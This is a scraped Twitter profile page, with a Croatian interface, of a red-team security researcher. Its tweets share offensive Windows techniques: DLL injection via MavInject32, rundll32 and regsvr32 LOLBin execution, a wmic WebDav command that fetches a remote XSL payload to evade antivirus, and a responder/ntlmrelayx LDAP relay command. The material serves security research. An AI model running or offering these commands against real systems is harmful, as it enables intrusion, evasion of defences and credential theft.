dee3

@ditrizna

Red Team, Security Research. Activity is mostly NDA affected, but sometimes there's something to share. Digging into AI Security when there's moment.

Vrijeme pridruživanja: kolovoz 2016.

Tweetovi

Blokirali ste korisnika/cu @ditrizna

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @ditrizna

  1. 20. sij

    Suggest you to take a look at this attempt to put several infosec projects together: WebDav, .NET injection, Obfuscation, C&C.. Direct shout-out to for your awesome work, w/ many others rocking 🔥

    Poništi
  2. proslijedio/la je Tweet
    14. pro 2017.

    Using MavInject32.exe (Microsoft Corp Signed) to load any dll in a running process. > "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL> cc:

    Prikaži ovu nit
    Poništi
  3. 13. stu 2019.

    Cool research and writeup by revealing new NTLM relay vector!

    Poništi
  4. proslijedio/la je Tweet
    4. lis 2019.

    I guess everyone knows about this Lolbin: RunDll32.exe shell32.dll,Control_RunDLL c:\test\test.dll but about this one? RunDll32.exe Shell32.dll,Control_RunDLLAsUser c:\test\test.dll

    Poništi
  5. proslijedio/la je Tweet
    4. ruj 2019.

    It's official, Donut is a Python module. Install with 'pip3 install donut-shellcode'

    Poništi
  6. 2. srp 2019.

    Some AV signatures do not work if you deliver payload using WebDav, like: wmic os get /format:"\\my.ip@SSL@443\wmic.xsl" BUT.. you need WebClient service to be running (not by default). Thanks to blog! Enable it with from userland: pushd \\my.ip@SSL@443\fake & popd

    Poništi
  7. proslijedio/la je Tweet
    29. svi 2019.

    When detecting "regsvr32" execution most people focus on things like /u, /i and scrobj.dll. Interestingly, if you create a DLL that exports a function called "DllRegisterServer" you can use regsvr32 to execute it by simply running "regsvr32.exe test.dll".

    Poništi
  8. 2. svi 2019.

    PowerShell ISE Filename parsing flaw RCE: Wonder if this would work with hidden files or NTFS ADS :)

    Poništi
  9. 8. ožu 2019.

    Why not only SMB, but LDAP signing is important as well. Dump LDAP contents without any AD creds, but with one in same broadcast domain (reponder SMB/HTTP off): sess1> responder -I <eth> sess2> ntlmrelayx -wh test -wa 1 -t ldap://<ad> --no-da --no-acl -l /tmp/loot

    Poništi
  10. 4. ožu 2019.
    Poništi
  11. 4. ožu 2019.
    Tweet je nedostupan.
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·